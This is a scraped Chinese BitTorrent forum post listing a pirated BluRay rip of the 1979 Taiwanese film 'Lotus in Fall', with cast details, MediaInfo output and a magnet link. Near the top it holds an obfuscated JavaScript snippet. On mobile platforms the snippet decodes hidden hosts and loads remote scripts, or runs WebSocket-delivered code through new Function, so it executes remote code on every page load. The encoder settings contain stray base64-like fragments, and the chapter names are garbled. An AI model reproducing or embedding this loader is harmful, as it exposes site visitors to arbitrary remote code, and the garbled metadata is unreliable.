秋莲 Lotus.in.Fall.1979.CHINESE.ENSUBBED.1080p.BluRay.x264.DDP2.0-LHD 9.66GB

版主小s 1月前 750

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 秋莲 / Autumn Lotus / Lotus in Fall
◎片  名 Chu lian
◎年  代 1979
◎产  地 中国台湾
◎类  别 剧情
◎语  言 汉语普通话
◎上映日期 1979-11-22(中国台湾)
◎IMDb链接  https://www.imdb.com/title/tt2532164/
◎豆瓣评分 6.5/10 (87人评价)
◎豆瓣链接  https://movie.douban.com/subject/26688113/
◎片  长 97分钟
◎导  演 赖成英 Cheng-Ying Lai (id:1111367)
◎编  剧 侯孝贤 Hsiao-hsien Hou (id:1093843)
◎演  员 凤飞飞 Feifei Fong (id:1317850)
       柯俊雄 Chun Hsiung Ko (id:1101152)
       梁修身 Hsiu-shen Liang (id:1320851)
       卢碧云 Bi Yun Lu (id:1311361)
       黄曼 Man Huang (id:1378983)
       郎雄 Sihung Lung (id:1274507)
       吴家骧 Chia-hsiang Wu (id:1072337)
       高幸枝 Kao Hsing-Chih (id:1340518)
       左宏元 Hung Yuen Tso (id:1325645)
       黄茂山 Mou Shan Huang (id:1347957)

◎标  签 台湾 / 台湾电影 / 凤飞飞 / 爱情 / 1979 / 侯孝贤 / 赖成英 / 柯俊雄

◎简  介
  剧情主要描写日本占据台湾时期,自小被卖身到别家作养女的秋莲和青年顺兴相恋,但少女自卖身为养女的那一刻,即已丧失了人权和地位,在这种不合人性的封建桎梏下,他们的命运只能走向悲剧结局。

  1. Video

  2. ID                                       : 1

  3. Format                                   : AVC

  4. Format/Info                              : Advanced Video Codec

  5. Format profile                           : [email protected]

  6. Format settings                          : CABAC / 5 Ref Frames

  7. Format settings, CABAC                   : Yes

  8. Format settings, Reference frames        : 5 frames

  9. Codec ID                                 : V_MPEG4/ISO/AVC

  10. Duration                                 : 1 h 37 min

  11. Bit rate                                 : 13.8 Mb/s

  12. Width                                    : 1 910 pixels

  13. Height                                   : 792 pixels

  14. Display aspect ratio                     : 2.40:1

  15. Frame rate mode                          : Constant

  16. Frame rate                               : 24.000 FPS

  17. Color space                              : YUV

  18. Chroma subsampling                       : 4:2:0

  19. Bit depth                                : 8 bits

  20. Scan type                                : Progressive

  21. Bits/(Pixel*Frame)                       : 0.380

  22. Stream size                              : 9.40 GiB (97%)

  23. Writing library                          : x264 core 142 r2431+42 c69a006 tMod [[email protected]:2:0 X86_64]

  24. Encoding settings                        : cabac=1 / ref=5 / deblock=1:-3:-3 / analyse=0x3:0x113 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.05:0.00 / mixed_ref=1 / me_range=32 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-2 / threads=9 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=13 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=60 / rc=crf / mbtree=0 / crf=17.1000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.30 / pb_ratio=1.20 / aq=3:0.75 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  25. Default                                  : Yes

  26. Forced                                   : No

  27. Color range                              : Limited

  28. Color primaries                          : BT.709

  29. Transfer characteristics                 : BT.709

  30. Matrix coefficients                      : BT.709


  31. Audio

  32. ID                                       : 2

  33. Format                                   : E-AC-3

  34. Format/Info                              : Enhanced AC-3

  35. Commercial name                          : Dolby Digital Plus

  36. Codec ID                                 : A_EAC3

  37. Duration                                 : 1 h 37 min

  38. Bit rate mode                            : Constant

  39. Bit rate                                 : 384 kb/s

  40. Channel(s)                               : 2 channels

  41. Channel layout                           : L R

  42. Sampling rate                            : 48.0 kHz

  43. Frame rate                               : 31.250 FPS (1536 SPF)

  44. Compression mode                         : Lossy

  45. Stream size                              : 268 MiB (3%)

  46. Title                                    : Mandarin

  47. Language                                 : Chinese

  48. Service kind                             : Complete Main

  49. Default                                  : Yes

  50. Forced                                   : No


  51. Menu

  52. 00:00:00.000                             : en:绗?01 绔?

  53. 00:15:33.000                             : en:绗?02 绔?

  54. 00:31:19.625                             : en:绗?03 绔?

  55. 00:47:22.917                             : en:绗?04 绔?

  56. 01:03:07.542                             : en:绗?05 绔?

  57. 01:19:53.000                             : en:绗?06 绔?

复制代码




TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:9E4A4E11FE87188782E6DF1EB97B21D8B17BAA2D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回